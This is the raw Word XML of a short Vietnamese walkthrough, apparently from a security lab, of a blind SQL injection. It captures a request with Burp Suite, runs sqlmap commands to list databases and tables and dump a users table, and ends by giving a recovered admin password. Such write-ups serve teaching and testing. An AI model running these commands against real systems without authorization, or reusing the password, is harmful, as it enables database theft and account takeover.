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6145" w14:textId="1DDDF89A" w:rsidR="006D72A1" w:rsidRDefault="006D72A1" w:rsidP="00DC73DF">
      <w:r>
        <w:t>Đầu tiên ta thấy chương trình không có filter các tin gửi vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796DEF8" w14:textId="7ADCB68C" w:rsidR="006D72A1" w:rsidRDefault="006D72A1" w:rsidP="00DC73DF">
      <w:r>
        <w:t>Ta sẽ bắt gói tin burpsuite và thực hiện tấn công sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D518B" w14:textId="00541ADD" w:rsidR="00806758" w:rsidRDefault="00806758" w:rsidP="00DC73DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2FA748" wp14:editId="13FFD1FE">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11092592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9208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975" w14:textId="7AF899E5" w:rsidR="006D72A1" w:rsidRDefault="006D72A1" w:rsidP="00DC73DF">
      <w:r>
        <w:t>Đầu tiên tìm db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9322B" w14:textId="66416930" w:rsidR="00806758" w:rsidRDefault="00806758" w:rsidP="00DC73DF">
      <w:r w:rsidRPr="00806758">
        <w:t>py sqlmap.py -r .\blind.txt --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DDF85C" w14:textId="2E34DF21" w:rsidR="006C2A75" w:rsidRDefault="006C2A75" w:rsidP="00DC73DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EA2AED" wp14:editId="63381345">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7152525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256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F0F" w14:textId="06456AC9" w:rsidR="006D72A1" w:rsidRDefault="006D72A1" w:rsidP="00DC73DF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp tục tìm tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70448BC9" w14:textId="6A41DAA7" w:rsidR="006C2A75" w:rsidRDefault="00806758" w:rsidP="00DC73DF">
      <w:r w:rsidRPr="00806758">
        <w:t>python sqlmap.py -r .\blind.txt --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5106CFA1" w14:textId="301E4463" w:rsidR="00C54FA4" w:rsidRDefault="006C2A75" w:rsidP="00DC73DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14565A90" wp14:editId="2699104F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16683671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716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599E" w14:textId="791B654B" w:rsidR="006D72A1" w:rsidRDefault="00600EED" w:rsidP="00DC73DF">
      <w:r>
        <w:t xml:space="preserve">Tiếp tục thực hiện dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09048146" w14:textId="6DA3806A" w:rsidR="00806758" w:rsidRDefault="00806758" w:rsidP="00DC73DF">
      <w:r w:rsidRPr="00806758">
        <w:t xml:space="preserve">python sqlmap.py -r D:\Chibi\ISP\Web\sqlmap\blind.txt -T users </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00806758">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010E058" w14:textId="2B09E323" w:rsidR="00806758" w:rsidRDefault="00F56E3A" w:rsidP="00DC73DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE25EDC" wp14:editId="4D84000C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5975107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073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76FA" w14:textId="3E906076" w:rsidR="00600EED" w:rsidRDefault="00600EED" w:rsidP="00DC73DF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cuối cùng ta có password admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9462D5" w14:textId="25587068" w:rsidR="00F56E3A" w:rsidRPr="00DC73DF" w:rsidRDefault="00F56E3A" w:rsidP="00DC73DF">
      <w:r w:rsidRPr="00F56E3A">
        <w:t>e2azO93i</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F56E3A" w:rsidRPr="00DC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2"/>
    <w:rsid w:val="00580D92"/>
    <w:rsid w:val="00600EED"/>
    <w:rsid w:val="006C2A75"/>
    <w:rsid w:val="006D72A1"/>
    <w:rsid w:val="00806758"/>
    <w:rsid w:val="00C54FA4"/>
    <w:rsid w:val="00DC73DF"/>
    <w:rsid w:val="00F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736D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{443C5110-570A-4DCB-A577-43E0A57E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2023-04-14T13:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T15:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>